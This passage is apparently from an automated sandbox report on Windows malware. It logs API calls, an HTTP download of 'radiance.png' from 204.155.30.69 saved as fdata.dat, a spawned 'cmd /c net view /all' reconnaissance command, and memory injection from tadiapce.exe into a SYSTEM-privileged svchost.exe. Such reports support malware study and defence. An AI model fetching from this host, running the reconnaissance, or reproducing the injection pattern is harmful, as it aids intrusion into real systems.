Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfW, address_out = 0x76c2426d	1	Fn
Module	Load	module_name = WINHTTP.dll, base_address = 0x719a0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x719a2c01	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpConnect, address_out = 0x719ad9f5	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpOpen, address_out = 0x719a58b9	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x719a4aea	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x719bc5dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpReadData, address_out = 0x719acb9e	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x719ab262	1	Fn
Module	Get Address	module_name = c:\windows\system32\winhttp.dll, function = WinHttpSendRequest, address_out = 0x719a79bd	1	Fn
Module	Get Handle	module_name = c:\windows\system32\svchost.exe, base_address = 0x600000	1	Fn

Thread 0xdcc

Category	Operation	Information	Count	Logfile
System	Sleep	duration = 1 milliseconds (0.001 seconds)	100	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	100	Fn
Inet	Open Connection	protocol = HTTP, server_name = 204.155.30.69, server_port = 0	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /radiance.png, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 204.155.30.69/radiance.png	1	Fn
Inet	Read Response	size = 3816, size_out = 3816	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	1	Fn Data
Inet	Read Response	size = 808, size_out = 808	1	Fn Data
Inet	Read Response	size = 3752, size_out = 3752	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	3	Fn Data
Inet	Read Response	size = 712, size_out = 712	1	Fn Data
Inet	Read Response	size = 3752, size_out = 3752	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	4	Fn Data
Inet	Read Response	size = 7040, size_out = 7040	1	Fn Data
Inet	Read Response	size = 7260, size_out = 7260	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	1	Fn Data
Inet	Read Response	size = 520, size_out = 520	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	8	Fn Data
Inet	Read Response	size = 1024, size_out = 1024	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	8	Fn Data
Inet	Read Response	size = 36, size_out = 36	1	Fn Data
Inet	Read Response	size = 7260, size_out = 7260	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	5	Fn Data
Inet	Read Response	size = 5504, size_out = 5504	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	1	Fn Data
Inet	Read Response	size = 7780, size_out = 7780	1	Fn Data
Inet	Read Response	size = 5808, size_out = 5808	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	1	Fn Data
Inet	Read Response	size = 3424, size_out = 3424	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	15	Fn Data
Inet	Read Response	size = 1992, size_out = 1992	1	Fn Data
Inet	Read Response	size = 952, size_out = 952	1	Fn Data
File	Create	filename = fdata.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = fdata.dat, size = 446464	1	Fn Data
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn

Process #51: cmd.exe

Information	Value
ID	#51
File Name	c:\windows\system32\cmd.exe
Command Line	/c net view /all
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:59, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:17

OS Process Information

Information	Value
PID	0xbb4
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BB8

Threads

Thread 0xbb8

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:34:04 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11083028	1	Fn
System	Get Time	type = Performance Ctr, time = 31304586788	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49df0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 136, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\net.exe, os_pid = 0x950, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #53: svchost.exe

Information	Value
ID	#53
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:59, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:17

OS Process Information

Information	Value
PID	0x748
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x E20 0x E28 0x E2C

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	59	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd40000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd41000, size = 35840	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4a000, size = 6656	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4c000, size = 3072	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4d000, size = 4084	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4e000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f000, size = 3072	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd50000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd51000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd52000, size = 1536	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x120000, size = 12	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x120000, size = 16	55	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f224, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f22c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f230, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f234, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f238, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f23c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f240, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f244, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f248, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f24c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f250, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f254, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f258, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f25c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f260, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f264, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f268, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f26c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f270, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f274, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f278, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f27c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f280, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f284, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 28	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f288, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f28c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f290, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f294, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f298, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f29c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2b0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 7	9	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 5	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 8	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2e0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2e4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2e8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2ec, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2f0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2f4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2f8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f2fc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4f300, size = 4	1	Fn Data

Threads

Thread 0xe20

Category	Operation	Information	Count	Logfile
Module	Load	module_name = ACTIVEDS.dll, base_address = 0x6eb70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\activeds.dll, function = ADsOpenObject, address_out = 0x6eb716e6	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76b5ce2e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x76b5ba60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDBCSLeadByteEx, address_out = 0x76b74dad	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryA, address_out = 0x76b5903d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x76b5da70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtect, address_out = 0x76b52341	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualQuery, address_out = 0x76b676d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = __dllonexit, address_out = 0x76f8f509	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = __mb_cur_max, address_out = 0x77023148	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _amsg_exit, address_out = 0x76feb2ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _errno, address_out = 0x76f8a5b8	1	Fn
